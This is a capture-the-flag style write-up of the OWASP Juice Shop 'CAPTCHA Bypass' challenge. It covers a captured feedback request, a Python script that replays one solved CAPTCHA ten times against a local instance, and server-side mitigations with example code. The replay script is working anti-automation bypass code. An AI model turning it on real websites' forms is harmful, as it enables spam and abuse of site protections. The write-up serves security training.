Hacking OWASP’s Juice Shop Pt. 20: CAPTCHA Bypass


Name:  CAPTCHA Bypass

Description: Submit 10 or more customer feedbacks within 10 seconds.

Difficulty: 3 star

Category: Broken Anti-Automation

Expanded Description: https://pwning.owasp-juice.shop/part2/broken-anti-automation.html

Tools used:

Burp, FoxyProxy

Resources used:



As usual, I started with the expanded description, which provided three possible methods for completing this challenge. Only one looked appealing, however.

Submit 10 or more customer feedbacks within 10 seconds
The Contact Us form for customer feedback contains a CAPTCHA to protect it from being abused through scripting. This challenge is about beating this automation protection.
A completely automated public Turing test to tell computers and humans apart, or CAPTCHA, is a program that allows you to distinguish between humans and computers. First widely used by Alta Vista to prevent automated search submissions, CAPTCHAs are particularly effective in stopping any kind of automated abuse, including brute-force attacks. They work by presenting some test that is easy for humans to pass but difficult for computers to pass; therefore, they can conclude with some certainty whether there is a human on the other end.
For a CAPTCHA to be effective, humans must be able to answer the test correctly as close to 100 percent of the time as possible. Computers must fail as close to 100 percent of the time as possible.
• You could prepare 10 browser tabs, solving every CAPTCHA and filling out each feedback form. Then you'd need to very quickly switch through the tabs and submit the forms in under 10 seconds.
• Should the Juice Shop ever decide to change the challenge into "Submit 100 or more customer feedbacks within 60 seconds" or worse, you'd probably have a hard time keeping up with any tab-switching approach.
• Investigate closely how the CAPTCHA mechanism works and try to find either a
Wrap this into a script (in whatever programming language you prefer) that repeats this 10 times.

First let’s figure out how the CAPTCHA mechanism works. I set up Burp and FoxyProxy, then made my way to the Customer Feedback form.

Customer Feedback form as rendered: an Author field, the comment "burpsuite go brrrr" (max. 160 characters), and the CAPTCHA question "What is 7+6+1 ?".

Nothing on the screen jumped out at me, so after filling in the form, I sent it off to Burp for analysis.

The captured request in Burp (headers cleaned up from the screenshot; the JSON body carries the CAPTCHA id and answer alongside the comment and rating):

POST /api/Feedbacks/ HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/plain, */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 84
Origin: http://localhost:3000
Connection: close
Referer: http://localhost:3000/
Cookie: language=en; welcomebanner_status=dismiss; ...

{"captchaId":0,"captcha":"14","comment":"burpsuite go brrrr","rating":1}
If you change the rating to “0”, you can also solve the “Zero Stars” challenge.

The CAPTCHA answer is sent in the JSON body as “captcha”, together with the “captchaId” it belongs to, and for this request the answer to 7+6+1 is 14. If “captchaId” is always 0 and the answer for captchaId 0 is always 14, then the server is only comparing the submitted answer against a stored one and never invalidating the CAPTCHA once it has been used. All that really needs to be done to bypass the CAPTCHA and complete the challenge, then, is to send the request to Burp’s Repeater tab and spam the “Send” button until you see…
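The expanded description's third option ("wrap this into a script that repeats this 10 times") is the same replay done programmatically. The script below is an added example, not code from the original post or from the Juice Shop project. It assumes a local Juice Shop at http://localhost:3000, a GET /rest/captcha/ endpoint that returns JSON with "captchaId" and the question text under "captcha" (e.g. "7+6+1"), and POST /api/Feedbacks/ accepting the body shape seen in the Burp capture; everything except the captured /api/Feedbacks/ path is an assumption. It fetches one CAPTCHA, solves it once, and replays the same id/answer pair, so it does not depend on the id being 0. The solver parses the arithmetic itself instead of handing server-supplied text to eval(), and nothing touches the network until run() is called.

```python
"""Automating the CAPTCHA replay against the Juice Shop feedback form.

Added example, not the post's or the Juice Shop project's own code.
Assumptions: a local Juice Shop at http://localhost:3000, GET
/rest/captcha/ returning JSON with "captchaId" and the question text
under "captcha" (e.g. "7+6+1"), and POST /api/Feedbacks/ taking the JSON
body shape visible in the Burp capture.
"""
import json
import re
import time
import urllib.error
import urllib.request

BASE_URL = "http://localhost:3000"  # assumption: default local Juice Shop


def solve_captcha(question: str) -> int:
    """Evaluate an arithmetic CAPTCHA such as "7+6+1 ?" without eval().

    Only digits and the operators + - * are accepted, with * binding
    tighter than + and -, so unexpected server text raises a ValueError
    instead of being executed.
    """
    expr = question.strip().rstrip("?").replace(" ", "")
    if not re.fullmatch(r"\d+(?:[-+*]\d+)*", expr):
        raise ValueError(f"unexpected CAPTCHA text: {question!r}")
    tokens = re.findall(r"\d+|[-+*]", expr)
    terms, ops = [], []            # additive terms and the +/- between them
    current = int(tokens[0])
    for i in range(1, len(tokens), 2):
        op, num = tokens[i], int(tokens[i + 1])
        if op == "*":
            current *= num         # fold products as we go
        else:
            terms.append(current)
            ops.append(op)
            current = num
    terms.append(current)
    total = terms[0]
    for op, term in zip(ops, terms[1:]):
        total = total + term if op == "+" else total - term
    return total


def build_feedback(captcha_id, answer: int, comment: str, rating: int = 1) -> dict:
    """Body for POST /api/Feedbacks/, same fields as the captured request."""
    return {"captchaId": captcha_id, "captcha": str(answer),
            "comment": comment, "rating": rating}


def get_json(path: str) -> dict:
    with urllib.request.urlopen(BASE_URL + path, timeout=5) as resp:
        return json.load(resp)


def post_json(path: str, body: dict) -> int:
    req = urllib.request.Request(
        BASE_URL + path, data=json.dumps(body).encode(),
        headers={"Content-Type": "application/json"}, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code            # e.g. 401 if the server rejects the CAPTCHA


def run(count: int = 10, comment: str = "burpsuite go brrrr"):
    """Fetch ONE CAPTCHA, solve it once, then replay that pair `count` times."""
    cap = get_json("/rest/captcha/")
    body = build_feedback(cap["captchaId"], solve_captcha(cap["captcha"]), comment)
    start = time.monotonic()
    statuses = [post_json("/api/Feedbacks/", body) for _ in range(count)]
    return statuses, time.monotonic() - start


if __name__ == "__main__":
    statuses, elapsed = run()
    print(f"{statuses.count(201)}/{len(statuses)} accepted in {elapsed:.2f}s: {statuses}")
```

If the server consumed each CAPTCHA on first use, only the first POST would be accepted; ten accepted responses inside the 10-second budget is the symptom of the replayable CAPTCHA. Juice Shop answers a created feedback with HTTP 201, which is what the final line counts.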

You successfully solved a challenge: CAPTCHA Bypass (Submit 10 or more customer feedbacks within 10 seconds.) 

Prevention and Mitigation Strategies:

Use a real CAPTCHA implementation, make each CAPTCHA single-use and short-lived on the server side so a solved one cannot be replayed, only allow registered users to submit feedback, and rate-limit the number of feedback comments each registered user is allowed to submit in a given time span.
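To make the weakness and the fix concrete, here is an added in-memory model of the server side; it is example code written for this page, not Juice Shop's own implementation. ReplayableCaptchaStore checks the answer but never consumes it, which is the property the Repeater replay relied on. SingleUseCaptchaStore removes the id on the first verification attempt (right or wrong) and expires it, and FeedbackRateLimiter adds the per-user quota from the list above. Timestamps are passed in explicitly so the behaviour is reproducible; the CAPTCHA questions, ids, TTL and limits are all invented for the example.

```python
"""Server-side model of the replayable CAPTCHA and of the mitigations above.

Added example, not Juice Shop's own code: an in-memory stand-in for a
feedback endpoint with a weak and a hardened CAPTCHA store plus a
per-user sliding-window rate limit. All timestamps are injected so the
scenarios below are deterministic.
"""
import secrets
import time
from collections import defaultdict, deque


def _new_question():
    """Three random operands joined with '+', in the style of '7+6+1'."""
    nums = [secrets.randbelow(10) for _ in range(3)]
    return "+".join(str(n) for n in nums), sum(nums)


def answer_for(question):
    """Helper for callers: questions from _new_question() are pure sums."""
    return sum(int(part) for part in question.split("+"))


class ReplayableCaptchaStore:
    """The weakness: verify() compares the stored answer but keeps it."""

    def __init__(self):
        self._answers = {}

    def issue(self, now=None):
        question, answer = _new_question()
        cid = len(self._answers)           # sequential ids, trivially guessable
        self._answers[cid] = answer
        return cid, question

    def verify(self, cid, answer, now=None):
        return self._answers.get(cid) == answer


class SingleUseCaptchaStore:
    """Hardened: an id is removed on the first verify() call and expires."""

    def __init__(self, ttl=120.0):
        self._pending = {}                 # cid -> (answer, issued_at)
        self._ttl = ttl

    def issue(self, now=None):
        now = time.monotonic() if now is None else now
        question, answer = _new_question()
        cid = secrets.token_hex(8)         # unguessable, so no enumeration
        self._pending[cid] = (answer, now)
        return cid, question

    def verify(self, cid, answer, now=None):
        now = time.monotonic() if now is None else now
        entry = self._pending.pop(cid, None)   # consumed even on a wrong answer
        if entry is None:
            return False
        stored, issued_at = entry
        return stored == answer and now - issued_at <= self._ttl


class FeedbackRateLimiter:
    """Sliding window: at most `limit` submissions per user per `window` s."""

    def __init__(self, limit=3, window=60.0):
        self._limit, self._window = limit, window
        self._hits = defaultdict(deque)

    def allow(self, user_id, now=None):
        now = time.monotonic() if now is None else now
        hits = self._hits[user_id]
        while hits and now - hits[0] > self._window:
            hits.popleft()                 # drop hits outside the window
        if len(hits) >= self._limit:
            return False
        hits.append(now)
        return True


def submit_feedback(store, limiter, user_id, cid, answer, now=None):
    """Rate-limit before verifying so failed CAPTCHA attempts also burn quota."""
    if not limiter.allow(user_id, now):
        return "rate limited"
    if not store.verify(cid, answer, now):
        return "bad captcha"
    return "accepted"
```

The ordering in submit_feedback is deliberate: checking the quota first means an attacker cannot probe CAPTCHA answers for free, and consuming the id on a wrong answer means a guessed id cannot be brute-forced across attempts.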

Lessons Learned and Things Worth Mentioning: 

  1. CAPTCHA works for a variety of reasons, and a home-brewed CAPTCHA is never going to be as sophisticated as the real thing.
  2. While the other two methods suggested in the expanded description would both work, I chose this method because every bit of practice I can get with Burp Suite helps me get more comfortable with it.
